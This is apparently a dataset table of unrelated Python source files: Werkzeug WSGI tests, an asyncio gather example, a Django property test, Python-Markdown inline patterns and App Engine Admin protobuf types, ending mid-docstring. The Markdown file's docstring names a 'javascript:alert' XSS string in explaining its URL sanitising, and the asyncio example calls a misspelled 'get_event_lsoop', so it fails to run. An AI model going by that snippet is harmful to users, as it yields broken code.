repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
BarcampBangalore/Barcamp-Bangalore-Android-App | refs/heads/master | gcm_flask/werkzeug/testsuite/wsgi.py | 54 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.wsgi
~~~~~~~~~~~~~~~~~~~~~~~
Tests the WSGI utilities.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import unittest
from os import path
from cStringIO import StringIO
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.wrappers import BaseResponse
from werkzeug.exceptions import BadRequest, ClientDisconnected
from werkzeug.test import Client, create_environ, run_wsgi_app
from werkzeug import wsgi
class WSGIUtilsTestCase(WerkzeugTestCase):
def test_shareddatamiddleware_get_file_loader(self):
app = wsgi.SharedDataMiddleware(None, {})
assert callable(app.get_file_loader('foo'))
def test_shared_data_middleware(self):
def null_application(environ, start_response):
start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])
yield 'NOT FOUND'
app = wsgi.SharedDataMiddleware(null_application, {
'/': path.join(path.dirname(__file__), 'res'),
'/sources': path.join(path.dirname(__file__), 'res'),
'/pkg': ('werkzeug.debug', 'shared')
})
for p in '/test.txt', '/sources/test.txt':
app_iter, status, headers = run_wsgi_app(app, create_environ(p))
assert status == '200 OK'
assert ''.join(app_iter).strip() == 'FOUND'
app_iter, status, headers = run_wsgi_app(app, create_environ('/pkg/debugger.js'))
contents = ''.join(app_iter)
assert '$(function() {' in contents
app_iter, status, headers = run_wsgi_app(app, create_environ('/missing'))
assert status == '404 NOT FOUND'
assert ''.join(app_iter).strip() == 'NOT FOUND'
def test_get_host(self):
env = {'HTTP_X_FORWARDED_HOST': 'example.org',
'SERVER_NAME': 'bullshit', 'HOST_NAME': 'ignore me dammit'}
assert wsgi.get_host(env) == 'example.org'
assert wsgi.get_host(create_environ('/', 'http://example.org')) \
== 'example.org'
def test_responder(self):
def foo(environ, start_response):
return BaseResponse('Test')
client = Client(wsgi.responder(foo), BaseResponse)
response = client.get('/')
assert response.status_code == 200
assert response.data == 'Test'
def test_pop_path_info(self):
original_env = {'SCRIPT_NAME': '/foo', 'PATH_INFO': '/a/b///c'}
# regular path info popping
def assert_tuple(script_name, path_info):
assert env.get('SCRIPT_NAME') == script_name
assert env.get('PATH_INFO') == path_info
env = original_env.copy()
pop = lambda: wsgi.pop_path_info(env)
assert_tuple('/foo', '/a/b///c')
assert pop() == 'a'
assert_tuple('/foo/a', '/b///c')
assert pop() == 'b'
assert_tuple('/foo/a/b', '///c')
assert pop() == 'c'
assert_tuple('/foo/a/b///c', '')
assert pop() is None
def test_peek_path_info(self):
env = {'SCRIPT_NAME': '/foo', 'PATH_INFO': '/aaa/b///c'}
assert wsgi.peek_path_info(env) == 'aaa'
assert wsgi.peek_path_info(env) == 'aaa'
def test_limited_stream(self):
class RaisingLimitedStream(wsgi.LimitedStream):
def on_exhausted(self):
raise BadRequest('input stream exhausted')
io = StringIO('123456')
stream = RaisingLimitedStream(io, 3)
assert stream.read() == '123'
self.assert_raises(BadRequest, stream.read)
io = StringIO('123456')
stream = RaisingLimitedStream(io, 3)
assert stream.read(1) == '1'
assert stream.read(1) == '2'
assert stream.read(1) == '3'
self.assert_raises(BadRequest, stream.read)
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readline() == '123456\n'
assert stream.readline() == 'ab'
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines() == ['123456\n', 'ab']
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines(2) == ['12']
assert stream.readlines(2) == ['34']
assert stream.readlines() == ['56\n', 'ab']
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readline(100) == '123456\n'
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines(100) == ['123456\n', 'ab']
io = StringIO('123456')
stream = wsgi.LimitedStream(io, 3)
assert stream.read(1) == '1'
assert stream.read(1) == '2'
assert stream.read() == '3'
assert stream.read() == ''
io = StringIO('123456')
stream = wsgi.LimitedStream(io, 3)
assert stream.read(-1) == '123'
def test_limited_stream_disconnection(self):
io = StringIO('A bit of content')
# disconnect detection on out of bytes
stream = wsgi.LimitedStream(io, 255)
with self.assert_raises(ClientDisconnected):
stream.read()
# disconnect detection because file close
io = StringIO('x' * 255)
io.close()
stream = wsgi.LimitedStream(io, 255)
with self.assert_raises(ClientDisconnected):
stream.read()
def test_path_info_extraction(self):
x = wsgi.extract_path_info('http://example.com/app', '/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app',
'https://example.com/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app')
assert x == u'/'
x = wsgi.extract_path_info(u'http://☃.net/', u'/fööbär')
assert x == u'/fööbär'
x = wsgi.extract_path_info(u'http://☃.net/x', u'http://☃.net/x/fööbär')
assert x == u'/fööbär'
env = create_environ(u'/fööbär', u'http://☃.net/x/')
x = wsgi.extract_path_info(env, u'http://☃.net/x/fööbär')
assert x == u'/fööbär'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/a/hello')
assert x is None
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app/hello',
collapse_http_schemes=False)
assert x is None
def test_get_host_fallback(self):
assert wsgi.get_host({
'SERVER_NAME': 'foobar.example.com',
'wsgi.url_scheme': 'http',
'SERVER_PORT': '80'
}) == 'foobar.example.com'
assert wsgi.get_host({
'SERVER_NAME': 'foobar.example.com',
'wsgi.url_scheme': 'http',
'SERVER_PORT': '81'
}) == 'foobar.example.com:81'
def test_multi_part_line_breaks(self):
data = 'abcdef\r\nghijkl\r\nmnopqrstuvwxyz\r\nABCDEFGHIJK'
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=16))
assert lines == ['abcdef\r\n', 'ghijkl\r\n', 'mnopqrstuvwxyz\r\n', 'ABCDEFGHIJK']
data = 'abc\r\nThis line is broken by the buffer length.\r\nFoo bar baz'
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=24))
assert lines == ['abc\r\n', 'This line is broken by the buffer length.\r\n', 'Foo bar baz']
def test_multi_part_line_breaks_problematic(self):
data = 'abc\rdef\r\nghi'
for x in xrange(1, 10):
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=4))
assert lines == ['abc\r', 'def\r\n', 'ghi']
def test_lines_longer_buffer_size(self):
data = '1234567890\n1234567890\n'
for bufsize in xrange(1, 15):
lines = list(wsgi.make_line_iter(StringIO(data), limit=len(data), buffer_size=4))
self.assert_equal(lines, ['1234567890\n', '1234567890\n'])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(WSGIUtilsTestCase))
return suite
|
showa-yojyo/bin | refs/heads/master | async/async10gather.py | 1 | #!/usr/bin/env python
"""async10gather.py: Use gather
Usage:
async10gather.py
"""
import asyncio
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})...")
await asyncio.sleep(1)
f *= i
print(f"Task {name}: factorial({i}) = {f}")
def main():
loop = asyncio.get_event_lsoop()
loop.run_until_complete(asyncio.gather(
factorial("A", 2),
factorial("B", 3),
factorial("C", 4)))
loop.close()
if __name__ == '__main__':
main()
|
yencarnacion/jaikuengine | refs/heads/master | .google_appengine/lib/django-1.2/tests/modeltests/properties/tests.py | 92 | from django.test import TestCase
from models import Person
class PropertyTests(TestCase):
def setUp(self):
self.a = Person(first_name='John', last_name='Lennon')
self.a.save()
def test_getter(self):
self.assertEqual(self.a.full_name, 'John Lennon')
def test_setter(self):
# The "full_name" property hasn't provided a "set" method.
self.assertRaises(AttributeError, setattr, self.a, 'full_name', 'Paul McCartney')
# But "full_name_2" has, and it can be used to initialise the class.
a2 = Person(full_name_2 = 'Paul McCartney')
a2.save()
self.assertEqual(a2.first_name, 'Paul')
|
dewitt/appengine-markdown | refs/heads/master | markdown/inlinepatterns.py | 5 | """
INLINE PATTERNS
=============================================================================
Inline patterns such as *emphasis* are handled by means of auxiliary
objects, one per pattern. Pattern objects must be instances of classes
that extend markdown.Pattern. Each pattern object uses a single regular
expression and needs support the following methods:
pattern.getCompiledRegExp() # returns a regular expression
pattern.handleMatch(m) # takes a match object and returns
# an ElementTree element or just plain text
All of python markdown's built-in patterns subclass from Pattern,
but you can add additional patterns that don't.
Also note that all the regular expressions used by inline must
capture the whole block. For this reason, they all start with
'^(.*)' and end with '(.*)!'. In case with built-in expression
Pattern takes care of adding the "^(.*)" and "(.*)!".
Finally, the order in which regular expressions are applied is very
important - e.g. if we first replace http://.../ links with <a> tags
and _then_ try to replace inline html, we would end up with a mess.
So, we apply the expressions in the following order:
* escape and backticks have to go before everything else, so
that we can preempt any markdown patterns by escaping them.
* then we handle auto-links (must be done before inline html)
* then we handle inline HTML. At this point we will simply
replace all inline HTML strings with a placeholder and add
the actual HTML to a hash.
* then inline images (must be done before links)
* then bracketed links, first regular then reference-style
* finally we apply strong and emphasis
"""
import markdown
import re
from urlparse import urlparse, urlunparse
import sys
if sys.version >= "3.0":
from html import entities as htmlentitydefs
else:
import htmlentitydefs
"""
The actual regular expressions for patterns
-----------------------------------------------------------------------------
"""
NOBRACKET = r'[^\]\[]*'
BRK = ( r'\[('
+ (NOBRACKET + r'(\[')*6
+ (NOBRACKET+ r'\])*')*6
+ NOBRACKET + r')\]' )
NOIMG = r'(?<!\!)'
BACKTICK_RE = r'(?<!\\)(`+)(.+?)(?<!`)\2(?!`)' # `e=f()` or ``e=f("`")``
ESCAPE_RE = r'\\(.)' # \<
EMPHASIS_RE = r'(\*)([^\*]*)\2' # *emphasis*
STRONG_RE = r'(\*{2}|_{2})(.*?)\2' # **strong**
STRONG_EM_RE = r'(\*{3}|_{3})(.*?)\2' # ***strong***
if markdown.SMART_EMPHASIS:
EMPHASIS_2_RE = r'(?<!\S)(_)(\S.*?)\2' # _emphasis_
else:
EMPHASIS_2_RE = r'(_)(.*?)\2' # _emphasis_
LINK_RE = NOIMG + BRK + \
r'''\(\s*(<.*?>|((?:(?:\(.*?\))|[^\(\)]))*?)\s*((['"])(.*)\12)?\)'''
# [text](url) or [text](<url>)
IMAGE_LINK_RE = r'\!' + BRK + r'\s*\((<.*?>|([^\)]*))\)'
#  or 
REFERENCE_RE = NOIMG + BRK+ r'\s*\[([^\]]*)\]' # [Google][3]
IMAGE_REFERENCE_RE = r'\!' + BRK + '\s*\[([^\]]*)\]' # ![alt text][2]
NOT_STRONG_RE = r'( \* )' # stand-alone * or _
AUTOLINK_RE = r'<((?:f|ht)tps?://[^>]*)>' # <http://www.123.com>
AUTOMAIL_RE = r'<([^> \!]*@[^> ]*)>' # <[email protected]>
HTML_RE = r'(\<([a-zA-Z/][^\>]*?|\!--.*?--)\>)' # <...>
ENTITY_RE = r'(&[\#a-zA-Z0-9]*;)' # &
LINE_BREAK_RE = r' \n' # two spaces at end of line
LINE_BREAK_2_RE = r' $' # two spaces at end of text
def dequote(string):
"""Remove quotes from around a string."""
if ( ( string.startswith('"') and string.endswith('"'))
or (string.startswith("'") and string.endswith("'")) ):
return string[1:-1]
else:
return string
ATTR_RE = re.compile("\{@([^\}]*)=([^\}]*)}") # {@id=123}
def handleAttributes(text, parent):
"""Set values of an element based on attribute definitions ({@id=123})."""
def attributeCallback(match):
parent.set(match.group(1), match.group(2))
return ATTR_RE.sub(attributeCallback, text)
"""
The pattern classes
-----------------------------------------------------------------------------
"""
class Pattern:
"""Base class that inline patterns subclass. """
def __init__ (self, pattern, markdown_instance=None):
"""
Create an instant of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*?)$" % pattern, re.DOTALL)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def getCompiledRegExp (self):
""" Return a compiled regular expression. """
return self.compiled_re
def handleMatch(self, m):
"""Return a ElementTree element from the given match.
Subclasses should override this method.
Keyword arguments:
* m: A re match object containing a match of the pattern.
"""
pass
def type(self):
""" Return class name, to define pattern type """
return self.__class__.__name__
BasePattern = Pattern # for backward compatibility
class SimpleTextPattern (Pattern):
""" Return a simple text of group(2) of a Pattern. """
def handleMatch(self, m):
text = m.group(2)
if text == markdown.INLINE_PLACEHOLDER_PREFIX:
return None
return text
class SimpleTagPattern (Pattern):
"""
Return element of type `tag` with a text attribute of group(3)
of a Pattern.
"""
def __init__ (self, pattern, tag):
Pattern.__init__(self, pattern)
self.tag = tag
def handleMatch(self, m):
el = markdown.etree.Element(self.tag)
el.text = m.group(3)
return el
class SubstituteTagPattern (SimpleTagPattern):
""" Return a eLement of type `tag` with no children. """
def handleMatch (self, m):
return markdown.etree.Element(self.tag)
class BacktickPattern (Pattern):
""" Return a `<code>` element containing the matching text. """
def __init__ (self, pattern):
Pattern.__init__(self, pattern)
self.tag = "code"
def handleMatch(self, m):
el = markdown.etree.Element(self.tag)
el.text = markdown.AtomicString(m.group(3).strip())
return el
class DoubleTagPattern (SimpleTagPattern):
"""Return a ElementTree element nested in tag2 nested in tag1.
Useful for strong emphasis etc.
"""
def handleMatch(self, m):
tag1, tag2 = self.tag.split(",")
el1 = markdown.etree.Element(tag1)
el2 = markdown.etree.SubElement(el1, tag2)
el2.text = m.group(3)
return el1
class HtmlPattern (Pattern):
""" Store raw inline html and return a placeholder. """
def handleMatch (self, m):
rawhtml = m.group(2)
inline = True
place_holder = self.markdown.htmlStash.store(rawhtml)
return place_holder
class LinkPattern (Pattern):
""" Return a link element from the given match. """
def handleMatch(self, m):
el = markdown.etree.Element("a")
el.text = m.group(2)
title = m.group(11)
href = m.group(9)
if href:
if href[0] == "<":
href = href[1:-1]
el.set("href", self.sanitize_url(href.strip()))
else:
el.set("href", "")
if title:
title = dequote(title) #.replace('"', """)
el.set("title", title)
return el
def sanitize_url(self, url):
"""
Sanitize a url against xss attacks in "safe_mode".
Rather than specifically blacklisting `javascript:alert("XSS")` and all
its aliases (see <http://ha.ckers.org/xss.html>), we whitelist known
safe url formats. Most urls contain a network location, however some
are known not to (i.e.: mailto links). Script urls do not contain a
location. Additionally, for `javascript:...`, the scheme would be
"javascript" but some aliases will appear to `urlparse()` to have no
scheme. On top of that relative links (i.e.: "foo/bar.html") have no
scheme. Therefore we must check "path", "parameters", "query" and
"fragment" for any literal colons. We don't check "scheme" for colons
because it *should* never have any and "netloc" must allow the form:
`username:password@host:port`.
"""
locless_schemes = ['', 'mailto', 'news']
scheme, netloc, path, params, query, fragment = url = urlparse(url)
safe_url = False
if netloc != '' or scheme in locless_schemes:
safe_url = True
for part in url[2:]:
if ":" in part:
safe_url = False
if self.markdown.safeMode and not safe_url:
return ''
else:
return urlunparse(url)
class ImagePattern(LinkPattern):
""" Return a img element from the given match. """
def handleMatch(self, m):
el = markdown.etree.Element("img")
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
el.set('src', self.sanitize_url(src))
else:
el.set('src', "")
if len(src_parts) > 1:
el.set('title', dequote(" ".join(src_parts[1:])))
if markdown.ENABLE_ATTRIBUTES:
truealt = handleAttributes(m.group(2), el)
else:
truealt = m.group(2)
el.set('alt', truealt)
return el
class ReferencePattern(LinkPattern):
""" Match to a stored reference and return link element. """
def handleMatch(self, m):
if m.group(9):
id = m.group(9).lower()
else:
# if we got something like "[Google][]"
# we'll use "google" as the id
id = m.group(2).lower()
if not id in self.markdown.references: # ignore undefined refs
return None
href, title = self.markdown.references[id]
text = m.group(2)
return self.makeTag(href, title, text)
def makeTag(self, href, title, text):
el = markdown.etree.Element('a')
el.set('href', self.sanitize_url(href))
if title:
el.set('title', title)
el.text = text
return el
class ImageReferencePattern (ReferencePattern):
""" Match to a stored reference and return img element. """
def makeTag(self, href, title, text):
el = markdown.etree.Element("img")
el.set("src", self.sanitize_url(href))
if title:
el.set("title", title)
el.set("alt", text)
return el
class AutolinkPattern (Pattern):
""" Return a link Element given an autolink (`<http://example/com>`). """
def handleMatch(self, m):
el = markdown.etree.Element("a")
el.set('href', m.group(2))
el.text = markdown.AtomicString(m.group(2))
return el
class AutomailPattern (Pattern):
"""
Return a mailto link Element given an automail link (`<[email protected]>`).
"""
def handleMatch(self, m):
el = markdown.etree.Element('a')
email = m.group(2)
if email.startswith("mailto:"):
email = email[len("mailto:"):]
def codepoint2name(code):
"""Return entity definition by code, or the code if not defined."""
entity = htmlentitydefs.codepoint2name.get(code)
if entity:
return "%s%s;" % (markdown.AMP_SUBSTITUTE, entity)
else:
return "%s#%d;" % (markdown.AMP_SUBSTITUTE, code)
letters = [codepoint2name(ord(letter)) for letter in email]
el.text = markdown.AtomicString(''.join(letters))
mailto = "mailto:" + email
mailto = "".join([markdown.AMP_SUBSTITUTE + '#%d;' %
ord(letter) for letter in mailto])
el.set('href', mailto)
return el
|
googleapis/googleapis-gen | refs/heads/master | google/appengine/v1/google-cloud-appengine-v1-py/google/cloud/appengine_admin_v1/types/version.py | 1 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.appengine_admin_v1.types import app_yaml
from google.cloud.appengine_admin_v1.types import deploy
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.appengine.v1',
manifest={
'InboundServiceType',
'ServingStatus',
'Version',
'EndpointsApiService',
'AutomaticScaling',
'BasicScaling',
'ManualScaling',
'CpuUtilization',
'RequestUtilization',
'DiskUtilization',
'NetworkUtilization',
'StandardSchedulerSettings',
'Network',
'Volume',
'Resources',
'VpcAccessConnector',
'Entrypoint',
},
)
class InboundServiceType(proto.Enum):
r"""Available inbound services."""
INBOUND_SERVICE_UNSPECIFIED = 0
INBOUND_SERVICE_MAIL = 1
INBOUND_SERVICE_MAIL_BOUNCE = 2
INBOUND_SERVICE_XMPP_ERROR = 3
INBOUND_SERVICE_XMPP_MESSAGE = 4
INBOUND_SERVICE_XMPP_SUBSCRIBE = 5
INBOUND_SERVICE_XMPP_PRESENCE = 6
INBOUND_SERVICE_CHANNEL_PRESENCE = 7
INBOUND_SERVICE_WARMUP = 9
class ServingStatus(proto.Enum):
r"""Run states of a version."""
SERVING_STATUS_UNSPECIFIED = 0
SERVING = 1
STOPPED = 2
class Version(proto.Message):
r"""A Version resource is a specific set of source code and
configuration files that are deployed into a service.
Attributes:
name (str):
Full path to the Version resource in the API. Example:
``apps/myapp/services/default/versions/v1``.
@OutputOnly
id (str):
Relative name of the version within the service. Example:
``v1``. Version names can contain only lowercase letters,
numbers, or hyphens. Reserved names: "default", "latest",
and any name with the prefix "ah-".
automatic_scaling (google.cloud.appengine_admin_v1.types.AutomaticScaling):
Automatic scaling is based on request rate,
response latencies, and other application
metrics. Instances are dynamically created and
destroyed as needed in order to handle traffic.
basic_scaling (google.cloud.appengine_admin_v1.types.BasicScaling):
A service with basic scaling will create an
instance when the application receives a
request. The instance will be turned down when
the app becomes idle. Basic scaling is ideal for
work that is intermittent or driven by user
activity.
manual_scaling (google.cloud.appengine_admin_v1.types.ManualScaling):
A service with manual scaling runs
continuously, allowing you to perform complex
initialization and rely on the state of its
memory over time. Manually scaled versions are
sometimes referred to as "backends".
inbound_services (Sequence[google.cloud.appengine_admin_v1.types.InboundServiceType]):
Before an application can receive email or
XMPP messages, the application must be
configured to enable the service.
instance_class (str):
Instance class that is used to run this version. Valid
values are:
- AutomaticScaling: ``F1``, ``F2``, ``F4``, ``F4_1G``
- ManualScaling or BasicScaling: ``B1``, ``B2``, ``B4``,
``B8``, ``B4_1G``
Defaults to ``F1`` for AutomaticScaling and ``B1`` for
ManualScaling or BasicScaling.
network (google.cloud.appengine_admin_v1.types.Network):
Extra network settings.
Only applicable in the App Engine flexible
environment.
zones (Sequence[str]):
The Google Compute Engine zones that are
supported by this version in the App Engine
flexible environment. Deprecated.
resources (google.cloud.appengine_admin_v1.types.Resources):
Machine resources for this version.
Only applicable in the App Engine flexible
environment.
runtime (str):
Desired runtime. Example: ``python27``.
runtime_channel (str):
The channel of the runtime to use. Only available for some
runtimes. Defaults to the ``default`` channel.
threadsafe (bool):
Whether multiple requests can be dispatched
to this version at once.
vm (bool):
Whether to deploy this version in a container
on a virtual machine.
beta_settings (Sequence[google.cloud.appengine_admin_v1.types.Version.BetaSettingsEntry]):
Metadata settings that are supplied to this
version to enable beta runtime features.
env (str):
App Engine execution environment for this version.
Defaults to ``standard``.
serving_status (google.cloud.appengine_admin_v1.types.ServingStatus):
Current serving status of this version. Only the versions
with a ``SERVING`` status create instances and can be
billed.
``SERVING_STATUS_UNSPECIFIED`` is an invalid value. Defaults
to ``SERVING``.
created_by (str):
Email address of the user who created this
version.
@OutputOnly
create_time (google.protobuf.timestamp_pb2.Timestamp):
Time that this version was created.
@OutputOnly
disk_usage_bytes (int):
Total size in bytes of all the files that are
included in this version and currently hosted on
the App Engine disk.
@OutputOnly
runtime_api_version (str):
The version of the API in the given runtime
environment. Please see the app.yaml reference
for valid values at
https://cloud.google.com/appengine/docs/standard/<language>/config/appref
runtime_main_executable_path (str):
The path or name of the app's main
executable.
service_account (str):
The identity that the deployed version will
run as. Admin API will use the App Engine
Appspot service account as default if this field
is neither provided in app.yaml file nor through
CLI flag.
handlers (Sequence[google.cloud.appengine_admin_v1.types.UrlMap]):
An ordered list of URL-matching patterns that should be
applied to incoming requests. The first matching URL handles
the request and other request handlers are not attempted.
Only returned in ``GET`` requests if ``view=FULL`` is set.
error_handlers (Sequence[google.cloud.appengine_admin_v1.types.ErrorHandler]):
Custom static error pages. Limited to 10KB per page.
Only returned in ``GET`` requests if ``view=FULL`` is set.
libraries (Sequence[google.cloud.appengine_admin_v1.types.Library]):
Configuration for third-party Python runtime libraries that
are required by the application.
Only returned in ``GET`` requests if ``view=FULL`` is set.
api_config (google.cloud.appengine_admin_v1.types.ApiConfigHandler):
Serving configuration for `Google Cloud
Endpoints <https://cloud.google.com/appengine/docs/python/endpoints/>`__.
Only returned in ``GET`` requests if ``view=FULL`` is set.
env_variables (Sequence[google.cloud.appengine_admin_v1.types.Version.EnvVariablesEntry]):
Environment variables available to the application.
Only returned in ``GET`` requests if ``view=FULL`` is set.
build_env_variables (Sequence[google.cloud.appengine_admin_v1.types.Version.BuildEnvVariablesEntry]):
Environment variables available to the build environment.
Only returned in ``GET`` requests if ``view=FULL`` is set.
default_expiration (google.protobuf.duration_pb2.Duration):
Duration that static files should be cached by web proxies
and browsers. Only applicable if the corresponding
`StaticFilesHandler <https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions#StaticFilesHandler>`__
does not specify its own expiration time.
Only returned in ``GET`` requests if ``view=FULL`` is set.
health_check (google.cloud.appengine_admin_v1.types.HealthCheck):
Configures health checking for instances. Unhealthy
instances are stopped and replaced with new instances. Only
applicable in the App Engine flexible environment.
Only returned in ``GET`` requests if ``view=FULL`` is set.
readiness_check (google.cloud.appengine_admin_v1.types.ReadinessCheck):
Configures readiness health checking for instances.
Unhealthy instances are not put into the backend traffic
rotation.
Only returned in ``GET`` requests if ``view=FULL`` is set.
liveness_check (google.cloud.appengine_admin_v1.types.LivenessCheck):
Configures liveness health checking for instances. Unhealthy
instances are stopped and replaced with new instances
Only returned in ``GET`` requests if ``view=FULL`` is set.
nobuild_files_regex (str):
Files that match this pattern will not be built into this
version. Only applicable for Go runtimes.
Only returned in ``GET`` requests if ``view=FULL`` is set.
deployment (google.cloud.appengine_admin_v1.types.Deployment):
Code and application artifacts that make up this version.
Only returned in ``GET`` requests if ``view=FULL`` is set.
version_url (str):
Serving URL for this version. Example:
"https://myversion-dot-myservice-dot-
myapp.appspot.com"
@OutputOnly
endpoints_api_service (google.cloud.appengine_admin_v1.types.EndpointsApiService):
Cloud Endpoints configuration.
If endpoints_api_service is set, the Cloud Endpoints
Extensible Service Proxy will be provided to serve the API
implemented by the app.
entrypoint (google.cloud.appengine_admin_v1.types.Entrypoint):
The entrypoint for the application.
vpc_access_connector (google.cloud.appengine_admin_v1.types.VpcAccessConnector):
Enables VPC connectivity for standard apps.
"""
name = proto.Field(
proto.STRING,
number=1,
)
id = proto.Field(
proto.STRING,
number=2,
)
automatic_scaling = proto.Field(
proto.MESSAGE,
number=3,
oneof='scaling',
message='AutomaticScaling',
)
basic_scaling = proto.Field(
proto.MESSAGE,
number=4,
oneof='scaling',
message='BasicScaling',
)
manual_scaling = proto.Field(
proto.MESSAGE,
number=5,
oneof='scaling',
message='ManualScaling',
)
inbound_services = proto.RepeatedField(
proto.ENUM,
number=6,
enum='InboundServiceType',
)
instance_class = proto.Field(
proto.STRING,
number=7,
)
network = proto.Field(
proto.MESSAGE,
number=8,
message='Network',
)
zones = proto.RepeatedField(
proto.STRING,
number=118,
)
resources = proto.Field(
proto.MESSAGE,
number=9,
message='Resources',
)
runtime = proto.Field(
proto.STRING,
number=10,
)
runtime_channel = proto.Field(
proto.STRING,
number=117,
)
threadsafe = proto.Field(
proto.BOOL,
number=11,
)
vm = proto.Field(
proto.BOOL,
number=12,
)
beta_settings = proto.MapField(
proto.STRING,
proto.STRING,
number=13,
)
env = proto.Field(
proto.STRING,
number=14,
)
serving_status = proto.Field(
proto.ENUM,
number=15,
enum='ServingStatus',
)
created_by = proto.Field(
proto.STRING,
number=16,
)
create_time = proto.Field(
proto.MESSAGE,
number=17,
message=timestamp_pb2.Timestamp,
)
disk_usage_bytes = proto.Field(
proto.INT64,
number=18,
)
runtime_api_version = proto.Field(
proto.STRING,
number=21,
)
runtime_main_executable_path = proto.Field(
proto.STRING,
number=22,
)
service_account = proto.Field(
proto.STRING,
number=127,
)
handlers = proto.RepeatedField(
proto.MESSAGE,
number=100,
message=app_yaml.UrlMap,
)
error_handlers = proto.RepeatedField(
proto.MESSAGE,
number=101,
message=app_yaml.ErrorHandler,
)
libraries = proto.RepeatedField(
proto.MESSAGE,
number=102,
message=app_yaml.Library,
)
api_config = proto.Field(
proto.MESSAGE,
number=103,
message=app_yaml.ApiConfigHandler,
)
env_variables = proto.MapField(
proto.STRING,
proto.STRING,
number=104,
)
build_env_variables = proto.MapField(
proto.STRING,
proto.STRING,
number=125,
)
default_expiration = proto.Field(
proto.MESSAGE,
number=105,
message=duration_pb2.Duration,
)
health_check = proto.Field(
proto.MESSAGE,
number=106,
message=app_yaml.HealthCheck,
)
readiness_check = proto.Field(
proto.MESSAGE,
number=112,
message=app_yaml.ReadinessCheck,
)
liveness_check = proto.Field(
proto.MESSAGE,
number=113,
message=app_yaml.LivenessCheck,
)
nobuild_files_regex = proto.Field(
proto.STRING,
number=107,
)
deployment = proto.Field(
proto.MESSAGE,
number=108,
message=deploy.Deployment,
)
version_url = proto.Field(
proto.STRING,
number=109,
)
endpoints_api_service = proto.Field(
proto.MESSAGE,
number=110,
message='EndpointsApiService',
)
entrypoint = proto.Field(
proto.MESSAGE,
number=122,
message='Entrypoint',
)
vpc_access_connector = proto.Field(
proto.MESSAGE,
number=121,
message='VpcAccessConnector',
)
class EndpointsApiService(proto.Message):
r"""`Cloud Endpoints <https://cloud.google.com/endpoints>`__
configuration. The Endpoints API Service provides tooling for
serving Open API and gRPC endpoints via an NGINX proxy. Only valid
for App Engine Flexible environment deployments.
The fields here refer to the name and configuration ID of a
"service" resource in the `Service Management
API <https://cloud.google.com/service-management/overview>`__.
Attributes:
name (str):
Endpoints service name which is the name of
the "service" resource in the Service Management
API. For example
"myapi.endpoints.myproject.cloud.goog".
config_id (str):
Endpoints service configuration ID as specified by the
Service Management API. For example "2016-09-19r1".
By default, the rollout strategy for Endpoints is
``RolloutStrategy.FIXED``. This means that Endpoints starts
up with a particular configuration ID. When a new
configuration is rolled out, Endpoints must be given the new
configuration ID. The ``config_id`` field is used to give
the configuration ID and is required in this case.
Endpoints also has a rollout strategy called
``RolloutStrategy.MANAGED``. When using this, Endpoints
fetches the latest configuration and does not need the
configuration ID. In this case, ``config_id`` must be
omitted.
rollout_strategy (google.cloud.appengine_admin_v1.types.EndpointsApiService.RolloutStrategy):
Endpoints rollout strategy. If ``FIXED``, ``config_id`` must
be specified. If ``MANAGED``, ``config_id`` must be omitted.
disable_trace_sampling (bool):
Enable or disable trace sampling. By default,
this is set to false for enabled.
"""
class RolloutStrategy(proto.Enum):
r"""Available rollout strategies."""
UNSPECIFIED_ROLLOUT_STRATEGY = 0
FIXED = 1
MANAGED = 2
name = proto.Field(
proto.STRING,
number=1,
)
config_id = proto.Field(
proto.STRING,
number=2,
)
rollout_strategy = proto.Field(
proto.ENUM,
number=3,
enum=RolloutStrategy,
)
disable_trace_sampling = proto.Field(
proto.BOOL,
number=4,
)
class AutomaticScaling(proto.Message):
r"""Automatic scaling is based on request rate, response
latencies, and other application metrics.
Attributes:
cool_down_period (google.protobuf.duration_pb2.Duration):
The time period that the
`Autoscaler <https://cloud.google.com/compute/docs/autoscaler/>`__
